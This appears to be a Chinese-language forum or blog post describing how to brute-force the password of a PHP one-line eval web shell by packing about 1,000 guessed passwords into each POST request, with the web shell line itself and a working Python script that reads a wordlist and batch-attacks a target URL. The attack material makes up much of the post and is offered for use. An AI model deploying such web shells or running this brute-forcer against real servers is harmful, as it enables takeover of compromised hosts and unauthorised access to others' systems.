看了一下冰河大佬写的文章特别有感:https://bbs.ichunqiu.com/thread-16952-1-1.html
简单描述一下:
利用传统的单数据提交模式。
比如下面这个一句话木马:
<?php @eval($_POST['test']);?>
如果连接为http://172.16.0.5/index.php?shell?test=echo "password is test";
那么即为:test=echo "password is test";
倘若密码正确的情况下就会执行echo输出password is test
然后再利用“&”进行连接性爆破。Apache规定确实参数最多为1000。IIS为5883.
即:
i3ekr=echo "password is i3ekr";&123=echo "password is 123";&admin=echo "password is admin";&1=echo "password is 1";&pass=echo "password is pass";&test=echo "password is test";
最后由此即可写出脚本爆破了。
脚本:
# -*- coding: UTF-8 -*-#coding by v5est0r #单次多变量提交变量方式,一句话爆破提速千倍 import requests shell = 'http://192.168.1.103/hack.php' #v5est0r=response.write("password:v5est0r") post_data = {} #创建字典集 s = open('pass.txt','r') content = s.readlines() #分行读取字典 dics = len(content)/1000 print '当前字典中变量个数为: %s' % str(len(content)) print "字典将被分割为 %s 份" % str(dics) group = [] #字典每行独立化,写入元组 for h in range(0,len(content)): password = str(content[h]).strip(' ') #剔除换行符 group.append(password) #print group #下面建立错误密码的返回标识符 post_test = {'test_pass_test': 'echo "test!!";'} res = requests.post(shell, data=post_test) wrong_res = res.text for i in range(0,dics): new_group = [] for k in range(i * 1000, (i + 1) * 1000): new_group.append(group[k]) k += 1 for each in new_group: post_data[each] = 'echo "password is %s";' % each r = requests.post(shell, data=post_data) print "正在进行第 %s 组字典爆破" % str(i+1) post_data.clear() i+=1 print r.text if len(r.text) != len(wrong_res): break